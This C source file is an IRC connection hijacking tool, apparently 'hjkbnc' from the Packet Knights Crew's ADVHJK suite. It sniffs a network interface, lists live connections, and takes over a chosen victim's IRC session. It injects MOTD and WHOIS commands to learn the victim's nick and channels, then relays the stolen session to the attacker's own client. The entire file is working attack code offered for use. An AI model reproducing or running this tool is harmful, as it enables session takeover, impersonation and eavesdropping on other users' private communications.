#include <stdio.h>
#include <stdlib.h>

#include <pthread.h>
#include <hjklib.h>
#include <sys/socket.h>
#include <netinet/in.h>

void startit(int,u_short);
void *c2s();


char nick[20];
char channels[50][200];
int chancount=0;
hs hjs;
int cs;

int main(int argc,char **argv){
   int ind;
   u_short port;
   
   if(argc<2){
      printf("Usage %s <iface>\n",argv[0]);
      exit(0);
   }
   
   printf("Starting the hijack lib threads\n");
   if(init_read_thread(argv[1])==-1){
      printf("Cannot open %s\n",argv[1]);
      exit(0);
   }
   while(1){
      printf("1) Print Connection database\n");
      printf("2) Hijack an irc connection an pipe to your client\n");
      printf("3) Exit\n");
      scanf("%d",&ind);
      switch(ind){
       case 1:
	 printdb();
	 break;
       case 2:
	 printdb();
	 printf("Insert connection number : ");
	 scanf("%d",&ind);
	 printf("Insert port where we must listen (es 1234) :");
	 scanf("%d",&port);
	 printf("Now run your client and do /server 127.0.0.1 %i\n",port);
	 startit(ind,port);
	 exit(0);
       case 3:
	 exit(0);
      }
   }
}

void startit(int ind, u_short port){
   int bi,i,j,len;
   struct sockaddr_in sk;
   char buff[500],rb[500],*p,*p2;
   pthread_t cp;
   
   bi=socket(AF_INET,SOCK_STREAM,0);
   sk.sin_addr.s_addr=INADDR_ANY;
   sk.sin_family=AF_INET;
   sk.sin_port=htons(port);
   printf("binding to %i\n",port);
   bind(bi,(struct sockaddr *)&sk,sizeof(sk))!=0;
   listen(bi,1);
   
   cs=accept(bi,NULL,NULL);
   close(bi);
   printf("CLIENT CONNECTED! HIJACKING NOW!!!\n");
   
   hjs=hjkconnect(ind,TALK_SERVER);
   sleep(1);
   strcpy(buff,"\n\nMOTD\n\n");
   hjksend(hjs,buff,strlen(buff),1);
   sleep(1);
   strcpy(buff,"MOTD\n"); /* doing this two times.. better be sure */
   hjksend(hjs,buff,strlen(buff),1);
   memset(rb,0,500);
   printf("RECEIVING!\n");
   while(1){
      len=hjkrecv(hjs,rb,500);
      hjksend(hjs,buff,strlen(buff),1); /*one more time!*/
      //printf("len is %i\n",len);
      rb[len]=0;
      /* receive a buffer and examine all the lines ! */
      printf("--%i--\n%s\n---\n",len,rb);
      p=(char *)strstr(rb,"376");
      if(p!=NULL){
	 printf("MOTD FOUND!\n");
	 p=strchr(p,' ');
	 ++p;
	 for(i=0;i<19;i++){
	    if(p[i]!=' ')nick[i]=p[i];
	    else {
	       nick[i]=0;
	       break;
	    }
	 }
	 printf("NICK IS %s\n",nick);
	 break;
      }
      else printf("376 not found ?!?!!\n");
   }
   
   /* we must discover what our nick is */
   printf("starting channel discovery!\n");
   clnhijack(hjs);
   snprintf(buff,sizeof(buff),"whois %s\n",nick);
   hjksend(hjs,buff,strlen(buff),1);
   sleep(1);
   hjksend(hjs,buff,strlen(buff),1);
   while(1){
      len=hjkrecv(hjs,rb,500);
      rb[len]=0;
      p=(char *)strstr(rb,"319 ");
      if(p!=NULL){
	 printf("Parsing channels line!\n");
	 p2=strchr(p,'\n');
	 if(p2!=NULL)*p2=0;
	 p=strchr(p,' ');
	 p++;
	 p=strchr(p,' ');
	 p++;
	 p=strchr(p,' ');
	 p++;
	 /* now we are at the start of the chan space-separated list */
	 do {
	    i=0;
	    p++;
	    while(p[i]!=' ' && p[i]!=0&&i<200){
	       channels[chancount][i]=p[i];
	       i++;
	    }
	    printf("FOUND CHANNEL %s\n",channels[chancount]);
	    chancount++;
	    p=strchr(p,' ');
	 } while(p!=NULL);
	 break;
      }
      else printf("STRINGA WHOIS NON TROVATA!\n");
      hjksend(hjs,buff,strlen(buff),1);
   }
	 
   /* TIME TO TALK WITH THE CLIENT :) */
   snprintf(buff,sizeof(buff),":www.pkcrew.org 001 %s :hjkbnc v0.1 by |CyRaX| <cyrax@pkcrew.org>\n",nick);
   send(cs,buff,strlen(buff),0);
   snprintf(buff,sizeof(buff),":www.pkcrew.org 002 %s :This program is part of ADVHJK suite.\n",nick);
   send(cs,buff,strlen(buff),0);
   snprintf(buff,sizeof(buff),":www.pkcrew.org 003 %s :You can get this and lots of tools and advisories at www.pkcrew.org | Packet Knights Crew!\n",nick);
   send(cs,buff,strlen(buff),0);
   snprintf(buff,sizeof(buff),":www.pkcrew.org 004 %s :Now we'll make your client understand in which channels it is!\n",nick);
   send(cs,buff,strlen(buff),0);
   for(i=0;i<=chancount;i++){
      if(channels[i][0]=='@'){
	 for(j=0;(j<strlen(channels[i]));j++)
	  channels[i][j]=channels[i][j+1];
      }
      if(strcmp(channels[i],"")==0)continue;
      if(channels[i][0]!='#')continue;
      snprintf(buff,sizeof(buff),":%s!cyrax@pkcrew.org JOIN :%s\n",nick,channels[i]);
      send(cs,buff,strlen(buff),0);
      snprintf(buff,sizeof(buff),"names %s\n",channels[i]);
      hjksend(hjs,buff,strlen(buff),0);
   }
   pthread_create(&cp,NULL,c2s,NULL);
   while(1){
      len=hjkrecv(hjs,rb,500);
      rb[len]=0;
      send(cs,rb,strlen(rb),0);
   }
   hjkclose(hjs);
}

void *c2s(){
   char buff[500];
   int err;
   while((err=recv(cs,buff,500,0))>0){
      buff[err]=0;
      if(strncasecmp(buff,"nick",4)==0)continue;
      if(strncasecmp(buff,"user",4)==0)continue;
      hjksend(hjs,buff,strlen(buff),0);
   }
   hjkclose(hjs,BRUTE);
   printf("exiting!\n");
   exit(0);
}
